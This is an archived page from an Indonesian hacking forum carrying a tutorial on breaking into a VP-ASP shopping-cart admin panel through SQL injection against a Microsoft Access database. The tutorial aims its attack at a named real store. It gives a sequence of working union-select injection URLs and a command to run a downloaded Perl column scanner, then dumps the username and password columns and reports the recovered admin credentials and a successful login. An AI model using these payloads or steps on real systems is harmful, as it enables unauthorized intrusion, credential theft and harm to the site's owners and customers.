www.sekuritionline.net
-= Home =- -= Contact =- -= Register =- -= Manifesto =- -= Forum =- -= Baju SO =- -= FreeMail =-
T-Shirt S-O
Baju-SO
Login Panel
Username:
Password:
Remember Me

Not registered?
Register now!

Forgot your password?
FreeMail
Email Login :
Password :
New users
sign up!!!
powered by Everyone.net
Users Online
Online Now: 1
0 Members | 1 Guest
Our IRC Channel
IRC Channel:
#sekuritionline

IRC Nettwork:
irc.dal.net

Connect to channel
Banner Motd
sekuritionline.net



 
 
Bangga mendukung terlaksananya idsecconf 2008
Linker kami
Copy & paste Coding Dibawah ini
Untuk Banner kami
==================================
<a href="http://www.sekuritionline.net/"
target="_blank"><img src=
"http://www.sekuritionline.net/
banner/banner.gif" width="125" height="75"
alt="sekuritionline.net" title="SO-Te@m"
border="0" /></a>
Best View

Best View : 1024 x 768

IP

Page Ranking Tool
Simple Counter
2922
Exploits

--------------------------------

Info

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Untuk artikel yang memang membutuhkan gambar / foto sekiranya rekan-rekan dapat
mengirim artikel memakai file berbentuk .ZIP atau .RAR dan di email ke artikel@sekuritionline.net
Perhatian Pengiriman Artikel diharuskan melakukan Registrasi terlebih dahulu....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
New !!! dapatkan FreeMail namakamu@sekuritionline.net Klik Disini


PWD
Crack

Base64
Crack

MD5
Crack

Test
Speed


Thanks : OurFamily, All Indonesian Community Underground ....

irc.dal.net #sekuritionline

SAVE PALESTINE
#So
"Dalam dunia digital aku berdiri diatas Aliran bit yang penuh dengan keindahan ,
semua diciptakan dengan perasaan tanpa beban dan tanpa paksaan ,
tidak berdiri diatas keangkuhan semata tetapi menunduk dibawah kebenaran …
"

 

Search Engine
Key Word(s): Search By:  
Current Time/Date
January 26, 2009, 6:11 pm
Articles
By Irvian
Published: June 23, 2007
Print    Email

Masuk Ke Shopadmin Lewat Bug Sql Injection Pada Database Microsoft Access
Buka url berikut :
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1’

Inject :
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select
%201%20from%20users"

Error di atas artinya adalah tabel users tidak ada dalam database mari kita coba
ganti dengan tabel yang lain.
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select
%201%20from%20tbluser"



Error di atas artinya kita sudah menemukan nama tabel.

Langkah selajutnya Anda dapat mencoba menambah angka 1,2,3,4 dst sampai
request browser tidak error
Contoh :
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select
%201,2%20from%20tbluser"

http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select
%201,2,3%20from%20tbluser"

http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select
%201,2,3,4%20from%20tbluser"

dst sampai request browser tidak error.

Jika anda berfikir itu melelahkan maka kita lanjutkan turotrial ini ☺

Pertama – tama install perl di Windows anda.

Dapat di download di http://www.perl.com


Setelah installasi selesai di lakukan kita ambil source scanner jumlah kolom yang
saya buat dengan bahasa perl di http://fenomena.info/jet.txt .


Kemudian simpan di dalam directory windows anda misal c:\ lihat pada gambar
di bawah ini.

alankan Command Prompt, Kemudian ketik perl nama file.txt lihat pada gambar

Ketik command berikut di Command Prompt
perl jet.txt http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1 tbluser

Dimana :
jet.txt adalah nama source
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1 adalah url target
tbluser adalah nama tabel

Tunggu sebentar hingga program menemukan jumlah kolom lihat gambar.

Setelah sucses buka file irv.txt yang berada di dalam c:\

Copy lalu paste url yang ada dalam irv.txt ke dalam browser kamu


Ganti angka 3 dan 4 dengan fldusername dan fldpassword.


Mungkin anda bertanya :

Mengapa harus diganti dengan fldusername dan fldpassword ?

Good questions,
Yang kita eksploritasi di sini adalah vp-asp shoppingcart dimana di dalam tabel
tbluser pada vp-asp terdapat kolom fldusername dan fldpassword disamping
kolom - kolom yang lain. Disini saya hanya mengeluarkan info ke 2 kolom
tersebut karena ke 2 kolom tersebut berisi data username dan password.


Mengapa harus angka 3 dan 4 kenapa tidak 5 dan 6 atau 2 dan 21?

Nice questions,
Di dalam gambar di bawah ini dapat kita lihat ada 4 angka yang di lingkari merah
yaitu 3, 4,22, dan 18. angka - angka tersebut adalah tempat kita menganti
dengan nama kolom fldusername dan fldpassword.
Jadi fldusername dan password dapat dimasukan di angka 2 dan 3 atau
22 dan 18.


Sehingga jika angka 2 dan 3 diganti dengan fldusername dan fldpassword maka
urlnya menjadi:

http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1%20union%20select
%201,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20tbluser%22

Ditahap ini kita sudah menemukan username recgroup dan password rec123
Saatnya kita coba tes login ke

http://www.recgroup.ca/store/shopadmin.asp

Ups ternyata masuk.

Kini anda susah didalam

Created by irvian.
Mohon maaf jika terjadi kesalahan penulisan pada artikel ini
Semoga berguna!!



View Comments (3)